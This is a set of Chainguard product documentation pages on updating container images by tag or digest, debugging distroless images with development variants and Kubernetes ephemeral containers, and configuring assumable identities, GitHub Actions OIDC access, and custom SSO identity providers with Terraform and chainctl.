If you have confidence in your test suite, you may have a higher risk tolerance as you’ll trust that tests will fail and prevent broken images from going live. You’ll also want to consider what exact version of an image you are updating, whether you are pinning to a digest to guarantee reproducibility, defaulting to a tag, or automating minor or patch version updates. Even with safeguards in place, there is still a risk that at some point your application will use a version of an image it’s no longer fully compatible with, and you’ll need to have a plan in place to remedy this. There are some tools that can automate some or all of the process of updating your images. One such example is watchtower, which will update the running version of your app when an appropriately tagged image is pushed to a relevant registry. Additionally, there are FluxCD and Argo CD’s Image Update tool. If you’re going to use tools like these to automate image updates, it is recommended that you have testing and monitoring in place. Monitoring, alerting, and logging support you and your organization in making the information you need for debugging, security-related analysis, and compliance requirements available while also keeping a history of relevant data. Be mindful about tagging practices Developers will often create multiple variations of the same image. Sometimes these different images may represent distinct numbered versions of the image, or they may contain unique sets of packages. Typically, these different images in the same series will share a name and be stored in the same repository, but the developer will differentiate them by giving them different tags. In the context of containers, a tag is a human-readable identifier associated with an image. These make it easier to distinguish between different versions of images within the same repository. Oftentimes, developers will pin their project to a specific tag. As an example, imagine a project that uses an image named example_image and it is pinned to version 1.9, as in cgr.dev/chainguard/example_image:1.9. One day, version 2.0 is released, but the project developers choose not to upgrade, as doing so would introduce breaking changes. There may be situations where different tags point to the same image. For example, the first version of an image named sample_image is released with the tag 1. Later on, a minor version is released with the tag 1.2, and then even later a patch is released with the tag 1.2.3. In this case, the images tagged 1 and 1.2 would point to the same image as the one tagged 1.2.3, since 1.2.3 is the latest patch of both these major and minor versions. Conversely, if the developer later decides to patch version 1.1 of the sample_image and tags it as 1.1.4, the image tagged 1 will still point to 1.2.3, as that’s the latest iteration of the most recent minor version. Many systems will default to using the latest tag in certain cases if you don’t specify one. For example, if you use Docker to build an image but don’t specify a tag, it will always default to tagging it with latest. There’s a misconception that the latest tag always represents the most recent stable version of a given image. The normal convention is for the latest tag to point to the most up-to-date stable version of the image, but it is only a convention and not an enforced rule. One of the most important features of container builds is their reproducibility, as you would like to ensure that you are using the same image each time.
However, container tags are mutable, meaning that they can change over time. If you pin your application to a specific image tag and then the image associated with that tag gets updated and you redeploy or pull the image again, your application will be using a different image than it was before. Eventually, the image could change to the point that it no longer works with your application. When it comes to container versions, pinning an application to a major version is usually an acceptable practice since minor version increases typically won’t break things. That being said, the potential for “jumping” across minor or major versions without warning means that pinning an application to a major or minor tag isn’t suitable for many production workflows. To avoid this problem, it’s recommended to pin projects to an image digest. A digest is a content-based hash of the image contents and is guaranteed to be immutable. Because a digest will always point to the same image, its reproducibility is guaranteed. To find the digest for an image, users can run a command like the following. docker images --digests cgr.dev/chainguard/wolfi-base REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE cgr.dev/chainguard/wolfi-base latest sha256:490977f0fd3d8596d173839dbb314153797312553b43f6a24b0e341cf2e8d473 2606ed78c658 9 days ago 10.9MB To clarify, using tags to keep your images up to date may work for you and your organization. However, if you’re concerned about ensuring reproducibility — or you just want more control over what images you’re running — using digests can be a better approach for your situation. Recommendations As mentioned in the previous section, image digests guarantee full reproducibility. For that reason, it’s generally recommended that projects update their container images by digest whenever possible. Of course, digests do come with their own drawbacks. Image digests are not human readable; unlike tags, you can’t always tell the difference between two image digests with a quick visual scan. Digests also don’t make it clear whether a digest represents an older or newer version of an image; you can’t easily tell whether one digest is older than another. Combined, these factors mean that digests can make it more difficult to know whether an image is up to date. Chainguard Containers are rebuilt daily in order to ensure that they’re kept up to date and include all the latest available security patches. We recommend adopting a development pattern where digests are used to identify Chainguard Containers and are regularly updated by a bot, ensuring that the project and its downstream users benefit from reduced vulnerability counts, bug fixes, and new features. We do this ourselves with our digestabot tool. As with the recommendation stated previously, Chainguard requires a human to approve the digestabot’s update before it’s deployed. Technically, we could set up an automatic approval for the bot’s updates, but requiring a human approval combines the stability and reproducibility of using a digest with the good security hygiene of keeping images regularly updated. There are many factors to consider when developing a process for keeping your images up to date, so it’s difficult to offer advice that applies universally beyond the general strategies outlined in this guide. Of course, different update strategies will work for different circumstances. Ultimately, whatever process you or your organization land on for keeping images up to date should suit the needs of your users without becoming a burden to you or your organization.
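As a brief, hedged sketch of what pinning by digest can look like in a Dockerfile (the digest below is simply the example value from the docker images output above; substitute the digest you resolve for your own image):

```Dockerfile
# Pin the base image by digest rather than by tag; a digest always resolves to
# the exact same image contents.
FROM cgr.dev/chainguard/wolfi-base@sha256:490977f0fd3d8596d173839dbb314153797312553b43f6a24b0e341cf2e8d473
```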
Learn more To reiterate, there’s no one-size-fits-all approach to keeping one’s images up to date. Our goal for this article is to introduce some of the important factors one should consider when developing a container image update plan for their application. If you’d like to learn more about the subjects touched on in this guide, we encourage you to check out the following resources. How to Use Chainguard Containers How to Use Container Digests to Improve Reproducibility How To Compare Chainguard Containers with chainctl --- ### Debugging Distroless Container Images URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/debugging-distroless-images/ Last Modified: August 22, 2023 Tags: Chainguard Containers, Product Because distroless images are minimal and don’t include a package manager or a shell, debugging issues that occur at runtime may require a distinctive approach. In this article, we’ll discuss a few different strategies to debug distroless images. 1. Using Development Container Image Variants Before moving a workload to a distroless runtime image, it is important to make sure that it runs without issues in a similar but less restrictive environment, which allows for easier debugging. It is also possible to make a temporary base image change from a distroless image to a fully featured image that offers more debugging capabilities. The development variants of Chainguard Containers are designed to replicate the same packages as their distroless versions, but with additional software that helps in developing, building, and debugging applications in different language ecosystems. These are sometimes referred to as -dev variants since they are tagged with :latest-dev. For example, the following table shows a comparison between the different variants of the PHP image, and which packages are included with each variant:

| Package | latest | latest-dev | latest-fpm |
|---|---|---|---|
| wolfi-baselayout | X | X | X |
| ca-certificates-bundle | X | X | X |
| php | X | X | X |
| apk-tools | | X | |
| bash | | X | |
| busybox | | X | |
| git | | X | |
| composer | | X | |
| php-fpm | | | X |

You can find similar detailed package information for all Chainguard Containers in their respective image details pages under the SBOM section. Once you have changed your Dockerfile base image to use a development variant, you can overwrite the entry point command to get a shell on the container: docker run -it --entrypoint /bin/sh cgr.dev/chainguard/php:latest-dev Having a package manager and the ability to log into the image to debug any issues is very important at development time, but becomes unnecessary (and less safe) when talking about production environments. That’s why we recommend using a distroless variant for production workloads. Chainguard Containers in Production Although the development image variants have similar security features to their distroless versions, such as complete SBOMs and signatures, they feature additional software that is typically not necessary in production environments. The general recommendation is to use the development variants to build the application and then copy all application artifacts into a distroless image, which will result in a final container image that has a minimal attack surface and won’t allow package installations or logins.
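A hedged sketch of this build-then-copy pattern, using a Go application purely as an illustration (the image tags, paths, and binary name are placeholders, not a prescribed setup):

```Dockerfile
# Build stage: a Chainguard builder image that includes the Go toolchain.
FROM cgr.dev/chainguard/go:latest AS builder
WORKDIR /src
COPY . .
# Build a static binary so it can run in a minimal, distroless runtime image.
RUN CGO_ENABLED=0 go build -o /out/app .

# Runtime stage: copy only the built artifact into a distroless image.
FROM cgr.dev/chainguard/static:latest
COPY --from=builder /out/app /usr/bin/app
ENTRYPOINT ["/usr/bin/app"]
```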
That being said, it’s worth noting that the -dev variants of Chainguard Containers are still more secure than many popular container images based on fully-featured operating systems such as Debian and Ubuntu, because they carry less software, follow a more frequent patch cadence, and offer attestations for what is included. Language Ecosystem Guides The following guides show how to use these development images in combination with their distroless variants in order to build a final image that is also distroless, but contains everything the application needs to run: Getting Started with the Python Chainguard Container Getting Started with the Ruby Chainguard Container Getting Started with the Go Chainguard Container Getting Started with the Node Chainguard Container Getting Started with the PHP Chainguard Container Check also the guide on Creating Wolfi Container Images with Dockerfiles for guidance on how to build a custom image that can be used for development and debugging. 2. Using Ephemeral Debug Containers Another method to debug distroless images running in production is to use ephemeral debug containers, a special type of container that is temporarily attached to an existing Pod to troubleshoot and inspect running services. Suppose you have a Kubernetes cluster and one of the containers is having issues. Perhaps it doesn’t seem to be able to connect to other services in the cluster, or expected processes aren’t running. If the container has a shell, you’d be able to use kubectl exec to run debugging commands from inside the container to help diagnose the issue. With a minimal image, this isn’t possible, but we can achieve something very similar using kubectl debug to launch an ephemeral container. Let’s review an example. We’ll start by running a Chainguard NGINX image on a Kubernetes cluster: kubectl run nginx --image=cgr.dev/chainguard/nginx:latest Which should result in: pod/nginx created We can try to start a shell in this pod: kubectl exec -it nginx -- sh But the following error occurs: error: Internal error occurred: error executing command in container: failed to exec in container: failed to start exec "67bd5164394b1170ac1846bd77ea0b826332365970fbde3b3201bb9abec9b72c": OCI runtime exec failed: exec failed: unable to start container process: exec: "sh": executable file not found in $PATH: unknown Which is a long way of telling us there is no shell in the image. What we can do instead is use an ephemeral container. An ephemeral container will connect to the namespaces of an existing container, effectively allowing you to sideload debugging tools. Let’s try that now: kubectl debug -it nginx --image=cgr.dev/chainguard/wolfi-base --target=nginx You should get output similar to: Targeting container "nginx". If you don't see processes from this container it may be because the container runtime doesn't support this feature. Defaulting debug container name to debugger-87792. If you don't see a command prompt, try pressing enter. nginx:/# Now we can try running some debugging commands. 
Let’s start by seeing what’s running: nginx:/# ps aux PID USER TIME COMMAND 1 65532 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf -e /dev/stderr 10 65532 0:00 nginx: worker process 11 65532 0:00 nginx: worker process 12 65532 0:00 nginx: worker process 13 65532 0:00 nginx: worker process 14 65532 0:00 nginx: worker process 15 65532 0:00 nginx: worker process 16 65532 0:00 nginx: worker process 23 root 0:00 /bin/sh -l 32 root 0:00 ps aux And the open ports: nginx:/# netstat -lntu Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN To facilitate accessing processes running in other containers without having to specify a target, you may enable process namespace sharing within your Pod setup. It’s also worth noting that the filesystem may not be accessible due to default user permissions. For more strategies on how to debug production distroless containers, check the Kubernetes documentation on debugging running Pods. Resources to Learn More Minimal Container Images: Towards a More Secure Future - Chainguard Blog Why Distroless - Chainguard Container Documentation Ephemeral Containers - Official Kubernetes Documentation Introducing Ephemeral Containers - Google Open Source Blog Talk: Running a Go Debugger in Kubernetes - Cloud Native Rejekts EU 23 --- ### Overview of Assumable Identities in Chainguard URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/assumable-ids/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product Both chainctl and the Chainguard Console are useful tools for interacting with Chainguard. However, there may be times that you want to hand off certain administrative tasks to an automation system, like Buildkite or GitHub Actions. In such cases, you can create a Chainguard identity for these systems to assume, allowing them to perform certain tasks within a specific scope. You can restrict access to an identity so that only workflows that present tokens matching a specific issuer and subject can assume it. Likewise, assumable identities can be tied to certain roles — like viewer, owner, or editor — letting you place strict limits on what a given identity is allowed to do. This guide provides a general overview of assumable identities in Chainguard, outlining how they work and how to create them. About Assumable Identities Chainguard’s assumable identities are identities that can be assumed by workflows in order to complete tasks without manual authorization. In many ways, these are similar to AWS roles or Google Service accounts, as Chainguard identities allow you to delegate access to your Chainguard resources to external applications or services. Chainguard originally only supported what are referred to as literal identities. These are identities that consist of a unique mapping of verified issuer and subject to refer to an individual user. Literal identities can work well for self-service enrollment in some cases. However, they start to run into problems in several scenarios, such as with systems that use variable subject claims (like Buildkite, which injects commit SHAs) or automation systems (like continuous integration systems), which can be difficult to register to literal identities on their first use. Assumable identities essentially reverse the lookup process of literal identities. 
Instead of Chainguard analyzing a token’s issuer and subject to determine the client’s literal identity, the client presents an assumable identity’s UIDP (unique identifier path). Chainguard then checks this UIDP against the client’s token. If the token’s issuer and subject match those required by the identity, then the client may assume the identity. This enables you to create identities that can only be assumed by specific automated workflows, providing greater security for your build and deployment processes. We have a number of examples of how to create assumable identities for specific providers. GitHub GitLab AWS Lambda Jenkins Buildkite Bitbucket A notable difference between registered users and identities in Chainguard’s IAM model is that identities are tied to a specific IAM organization. When you create an identity, you must specify a Chainguard organization under which the identity will be created. However, an identity won’t automatically have access to the other resources associated with that organization. In order for an identity to be able to interact with an organization’s resources — including the containers, repositories, and users associated with the organization — it must be granted the permissions it needs to do so. To do this, you must also tie the identity to a role. Chainguard comes with a few built-in roles, including viewer, editor, and owner. You can also create custom role-bindings with chainctl. Check out the chainctl iam role-bindings documentation for more details. Now that you have a better understanding of what assumable identities are, let’s go over how you can set up an assumable identity. There are currently two main ways you can create an identity: with Terraform and with chainctl. Let’s first go over how to set up an identity with Terraform. Terraform To set up an assumable identity with Terraform, you will need to add a few specific blocks to your Terraform configuration. The following example resource block is the most important of these, as it is what creates the assumable identity. resource "chainguard_identity" "<id-ref>" { parent_id = <chainguard organization ID> name = "<identity name>" description = <<EOF This is an example description for an identity. EOF claim_match { issuer = "https://some.issuer.uri.com" subject = "example-subject" } } Here, parent_id defines the Chainguard organization that the identity will be tied to. This could be a literal value — like a Chainguard organization identification number — or a local value that references an existing organization. You can enter whatever you’d like for the name, though it helps to provide a descriptive name for your identities. The description field is optional, but it can be helpful to include to clarify the identity’s purpose. The claim_match block within this section is what specifies the users and workloads allowed to assume the identity. You must specify an issuer and subject in the claim_match block, but you can optionally specify an audience here as well. This example provides literal values for both the issuer and subject fields. This means that any workload or individual attempting to use this identity must have a signature whose issuer and subject match those within the claim_match block exactly. You can instead use the issuer_pattern, subject_pattern, or audience_pattern fields to pass regular expression patterns which clients must match in order to assume the identity.
claim_match { issuer_pattern = ".*" subject_pattern = ".*" audience_pattern = ".*" } This gives you some more flexibility with defining who has access to the identity. Note that this example claim_match block would match any signature, meaning it would be so permissive as to be insecure. Another block to include in your Terraform configuration is an output block that outputs the UIDP of the identity you’re trying to assume. This is a unique value that you can use to let Chainguard know that you want to assume the role. output "<id-ref>-identity" { value = chainguard_identity.<id-ref>.id } The last two blocks you should include in a Terraform configuration are what apply a role-binding to the new identity. First, you need to include a data section to look up the role. In this example it looks up Chainguard’s built-in viewer role. data "chainguard_roles" "viewer" { name = "viewer" } Then you need to include another resource block to create the role-binding using the determined role. The identity will have the permissions of that role over the organization specified within this block. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.<id-ref>.id group = chainguard_group.user-group.id role = data.chainguard_roles.viewer.items[0].id } This means that the identity this Terraform configuration will create will only be able to view the resources tied to the same organization the identity is tied to. Applying this configuration will create the assumable identity. You can follow any of our identity examples to create an assumable identity that can be used by a continuous integration workflow to interact with Chainguard. The Terraform files used in the linked tutorials are based closely on the template outlined here. Managing identities with chainctl You can also set up an assumed identity using the chainctl command-line tool. Specifically, you can run the chainctl iam identities create subcommand, which uses the following syntax: chainctl iam identities create <identity-name> \ --identity-issuer=<issuer of the identity> \ --issuer-keys=<keys for the issuer> \ --subject=<subject of the identity> \ --group=<organization name> \ --role=<role> As with Terraform, you must provide chainctl with certain information about the identity you want to create, including the issuer and subject of the identity, the role-bindings associated with the identity (if any), and the organization under which the identity should be created. You can change an existing identity with the update command. The following example would update the identity’s issuer. chainctl iam identities update <identity-name> --identity-issuer=https://new-issuer.mycompany.com To delete an identity, use the delete subcommand. chainctl iam identities delete <identity-name> For more detailed information on managing identities with chainctl, we encourage you to check out the chainctl reference documentation. Assuming an identity Whether you create an identity with chainctl or with Terraform, Chainguard will generate a UIDP (unique identifier path) tied to the identity. You can retrieve a list of all the identities you’ve created — along with their UIDPs — with the following command. 
chainctl iam identities ls -o table ID | NAME | TYPE | DESCRIPTION | ROLES | ISSUER | EXPIRES ------------------------------------------------------------+----------------+-------------+-------------+-----------------------+---------------------------------------------+---------- c95870ebffa72a258df087ea727ee92daf177e29/f067a9080d45a098 | sampleidentity | claim_match | | example-group: viewer | https://token.actions.githubusercontent.com | n/a If a workflow is authorized to assume the identity — meaning that its token matches the issuer and subject specified for the identity — then it only needs to present this identification number in order to assume it. Learn More As mentioned previously, we’ve published a few tutorials that outline how you can set up an identity for a CI/CD workflow to assume. We strongly encourage you to follow these guides to better understand how assumable identities work in Chainguard. --- ### Create an Assumable Identity for a GitHub Actions Workflow URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/github-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then create a GitHub Actions workflow that will assume the identity to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A GitHub repository you can use for testing out GitHub identity federation. To complete this guide, you must have permissions to create GitHub Actions on this testing repo. Creating Terraform Files We will be using Terraform to create an identity for a GitHub Actions workflow to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/github-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. 
data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the actions.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, actions.tf. actions.tf The actions.tf file is what will actually create the identity for your GitHub Actions workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "actions" { parent_id = data.chainguard_group.group.id name = "github-actions" description = <<EOF This is an identity that authorizes the actions in this repository to assume to interact with chainctl. EOF claim_match { issuer = "https://token.actions.githubusercontent.com" subject = "repo:<github_orgName>/<github_repoName>:ref:refs/heads/main" } } First, this section creates a Chainguard Identity tied to the Chainguard Organization looked up in the sample.tf file. The identity is named github-actions and has a brief description. The most important part of this section is the claim_match. When the GitHub Actions workflow tries to assume this identity later on, it must present a token matching the issuer and subject specified here in order to do so. The issuer is the entity that creates the token, while the subject is the entity (here, the Actions workflow) that the token represents. In this case, the issuer field points to https://token.actions.githubusercontent.com, the issuer of OIDC tokens for GitHub Actions. The subject field, meanwhile, points to the main branch of an example GitHub repository. The GitHub documentation provides several examples of subject claims which you can refer to if you want to construct a subject claim specific to your needs. For the purposes of this guide, though, you will need to replace <github_orgName> and <github_repoName> with the name of your GitHub user or organization and the repository where your GitHub Actions workflow is hosted. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "actions-identity" { value = chainguard_identity.actions.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.actions.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 3 to add, 0 to change, 0 to destroy. Changes to Outputs: + actions-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. 
Enter a value: After pressing ENTER, the command will complete and will output an actions-identity value. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: actions-identity = "<your actions identity>" This is the identity’s UIDP (unique identity path), which you configured the actions.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the GitHub Actions workflow you’ll use to test the identity. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create a GitHub Actions workflow which you’ll use to test out this identity. Creating and Testing a GitHub Actions Workflow To create a GitHub workflow, navigate to your repository in your browser and click the Actions tab. From there, find and click the New workflow button in the left-hand sidebar menu. Next, you’ll be prompted to choose a workflow template. Because this tutorial includes the exact code you’ll need for this workflow, you can skip this step by clicking the set up a workflow yourself ➔ link. You can name the workflow file whatever you like, although the default — main.yaml — will work for the purposes of this guide. In the Edit textbox, add the following. Be sure to replace <your actions identity> with the actions-identity value produced by the previous terraform apply command. name: Assume and Explore on: workflow_dispatch: {} jobs: assume-and-explore: name: actions assume example permissions: id-token: write runs-on: ubuntu-latest steps: - uses: chainguard-dev/setup-chainctl@main with: identity: <your actions identity> - run: | docker pull cgr.dev/<your organization>/example-image:latest This workflow is named actions assume example. The permissions block grants write permissions to the workflow for the id-token scope. Per the GitHub Actions documentation, you must grant this permission in order for the workflow to be able to fetch an OIDC token. This workflow performs two actions: First, it assumes the identity you just created with Terraform. Second, the workflow runs the docker pull command to pull an image from the organization’s Chainguard registry. Commit the workflow to your repository, then navigate back to the Actions tab. The Assume and Explore workflow will appear in the left-hand sidebar menu. Click on this, and then click the Run workflow button on the resulting page to execute the workflow. If the workflow completes successfully, this indicates that it can indeed assume the identity and interact with the organization. If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions, you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the workflow itself to change its behavior. For example, instead of pulling an image, you could have the workflow list available repos: - run: chainctl images repos list Of course, the GitHub Actions workflow will only be able to perform certain actions on certain resources, depending on what kind of access you grant it.
Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding, and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/github-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using GitHub Actions, we encourage you to check out the official documentation on the subject. --- ### Using Custom Identity Providers to Authenticate to Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/custom-idps/ Last Modified: January 7, 2025 Tags: Chainguard Containers, Overview The Chainguard platform supports Single Sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab, and Google, but SSO support allows users to bring their own identity provider for authentication. This is helpful when your organization mandates using a corporate identity provider — like Okta or Azure Active Directory — to authenticate to SaaS products. Usage Once an administrator has configured an identity provider and set up their organization, users can authenticate at the command line and in the web console using the identity provider’s organization. Authenticate with chainctl chainctl, the Chainguard command line interface (CLI), supports SSO authentication by supplying the identity provider organization name as a flag or by setting it as a default in configuration. To use a flag to authenticate using SSO, pass the --identity-provider flag to chainctl auth login. export IDP_ID=<your identity provider id here> chainctl auth login --identity-provider=$IDP_ID You can retrieve all your identity provider’s unique IDs by running chainctl iam identity-providers list. Note that you can also use the --headless option to log in with a custom IDP in an environment that doesn’t have a browser installed, such as a container or a remote server. By including this option, chainctl will output a special URL. You can then navigate to the URL in another device’s browser to log in with your custom IDP. To log in with a custom IDP using the --headless option, you would run a command like the following: chainctl auth login --headless --identity-provider=$IDP_ID Then you can use the URL in this command’s output to complete the login flow from another device’s browser. Note: As of this writing (September 2024), using the headless login flow with a custom IDP is still an experimental feature. Please reach out to us through your customer success manager or the support portal to report any feedback. Also, until this feature becomes enabled by default, you must enable it yourself with the following command: chainctl config set auth.device-flow chainguard Setting a default identity provider As an alternative to remembering identity provider IDs, you can set the default identity provider by editing the chainctl configuration file. You can do so with the following command. 
chainctl config edit This will open your system's default text editor where you can edit the local chainctl config. Add the following lines to this file.

default:
  identity-provider: <your identity provider id here>

Then save and close the file. If your system's default editor is nano, for example, you can do so by pressing CTRL + X, Y, and then ENTER. You can also set this with a single command using the chainctl config set subcommand, as in this example. chainctl config set default.identity-provider <your identity provider id here> Once set, the configured identity provider will be used automatically any time you run chainctl auth login. Authenticate with chainctl using a Verified Organization If your organization is verified, you can use your organization name instead of the ID of your identity provider to authenticate. chainctl auth login --org-name example.com You can add your organization's name to your chainctl config to make this a default setting.

default:
  org-name: example.com

To learn more about working with your chainctl config, you can read our doc on How to Manage chainctl Configuration. Authenticate with the Chainguard Console To authenticate with the Chainguard Console, open the login screen. Then, select one of the following options: To use your organization's SSO, enter your Organization or email address and click Continue. To use a third-party identity provider, click the corresponding option from the list. To use your email and a password, enter your email and click Continue. In each of these cases, you will be redirected to an external identity provider to authenticate and then returned to the Chainguard Console. If you are using your email and a password, authentication is handled by and credentials are stored with Auth0. Setup and Administration Chainguard SSO supports OpenID Connect (OIDC) compatible identity providers. In addition, identity providers must support the following: The authorization code grant type (sometimes called the authorization code flow). The standard openid, email, and profile scopes. Note that the Chainguard platform will partially function with only the openid scope, but full functionality requires the email and profile scopes as well. Customer-managed identity providers must also have a public, unauthenticated OIDC discovery endpoint. Typically, identity providers enable you to set up SSO by creating a specific resource on the provider's platform. For example, Ping Identity requires you to add an application, while Okta has you create an app integration. To set up SSO for your identity provider, you must configure one of these resources to use OIDC so that the Chainguard platform can interact with the provider. Following that, you have to configure the Chainguard platform to use that application. Integration Guides for supported identity providers We have published guides for multiple platforms, including Okta and Ping Identity. If you aren't using one of these identity providers, you can complete the following Generic Integration Guide to configure your provider to work with Chainguard. However, be aware that Chainguard does not actively support identity providers other than the ones listed previously. If you are using an alternate identity provider, we encourage you to contact us to learn more. Generic Integration Guide For a generic OIDC-compatible identity provider, start by creating an OIDC application.
If possible, set as much metadata as possible for the application so that your users can identify this application as the Chainguard platform. The following assets and details can be helpful to include in the metadata:
- The Console homepage is console.chainguard.dev/
- Our terms of service can be found at chainguard.dev/terms-of-service
- Our terms of use can be found at chainguard.dev/terms-of-use
- Our privacy policy is located at chainguard.dev/privacy-notice

You can also add a Chainguard logo icon here to help your users visually identify this integration. The icon from the Chainguard Console will be suitable for most platforms. Next, configure your OIDC application as follows:
- Set the redirect URI to https://issuer.enforce.dev/oauth/callback
- Restrict grant types to authorization code only. It is critical that your application does not support "client credentials", "device code", "implicit" or other grant types (sometimes called "flows")
- Restrict response types to only authorization codes (sometimes called just "code")
- Enable the "openid", "email" and "profile" scopes for the application
- Disable PKCE or set it to optional

Finally, configure a set of client credentials and make note of the following details to configure Chainguard:
- The issuer URL
- Client ID
- Client Secret

Next, use chainctl to log in to Chainguard with an OIDC provider (such as Google, GitHub, or GitLab) to bootstrap your account. chainctl auth login The bootstrap account can use any supported IDP – for example you may choose to temporarily use a personal Google account. You can leave this account active as a backup account or, if you prefer, you can delete the account by removing the role-binding after configuring the custom IDP. Create a new identity provider using the details you noted from your OIDC application. Be sure to update the details in the following example export commands to align with your own application/client ID, client secret, and issuer URL.

export NAME=my-sso-identity-provider
export CLIENT_ID=<your application/client id here>
export CLIENT_SECRET=<your client secret here>
export ISSUER=<your issuer url here>
export ORG=<your organization UIDP here>

chainctl iam identity-provider create \
  --configuration-type=OIDC \
  --oidc-client-id=${CLIENT_ID} \
  --oidc-client-secret=${CLIENT_SECRET} \
  --oidc-issuer=${ISSUER} \
  --oidc-additional-scopes=email \
  --oidc-additional-scopes=profile \
  --parent=${ORG} \
  --default-role=viewer \
  --name=${NAME}

The oidc-issuer, oidc-client-id, and oidc-client-secret values are required when setting up an OIDC configuration with chainctl. You must also include a unique name for each custom IDP account. Be aware that if you don't include the --parent or --default-role options in the command, you will be prompted to select these values interactively. The --parent option specifies which Chainguard IAM organization your identity provider will be installed under. The --default-role option defines the default role granted to users registering with this identity provider. The previous example specifies the viewer role, but depending on your needs you might choose editor or owner. For more information, refer to the IAM and Security section. You can retrieve a list of all your Chainguard organizations — along with their UIDPs — with the following command. chainctl iam organizations ls -o table

                   ID                     |    NAME    | DESCRIPTION
------------------------------------------+------------+---------------------
 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org |
 . . .                                    | . . .      |
Your organization selection won't affect how your users authenticate but will have implications for who has permission to modify the SSO configuration. Managing Existing Identity Providers Identity providers can be managed via chainctl using the chainctl iam identity-provider subcommand. To create new providers, you can use the create subcommand. chainctl iam identity-provider create To list out every configured identity provider, run the list subcommand. chainctl iam identity-provider list This will return a list of details for each of your identity providers, including their names and unique IDs. To modify an existing identity provider, use the update subcommand. chainctl iam identity-provider update This can be useful for rotating client credentials. Lastly, to delete an identity provider, run the delete subcommand. chainctl iam identity-provider delete For more details, check out the chainctl documentation for these commands. IAM and Security Once an identity provider has been created on the Chainguard platform, any user that can authenticate with that identity provider will be able to use it to access the Chainguard platform. It's important to note that users can do so even if they have no IAM capabilities with the IAM organization at which the identity provider is defined. Identity providers give access to the Chainguard platform, but not the specific IAM organization where the identity provider is defined. The IAM capabilities identity_providers.create, identity_providers.update, identity_providers.list and identity_providers.delete control which users can read and manipulate identity providers. The built-in roles viewer, editor and owner have the following capabilities related to identity providers:
- viewer: identity_providers.list
- editor: identity_providers.list
- owner: identity_providers.create, identity_providers.list, identity_providers.update, identity_providers.delete

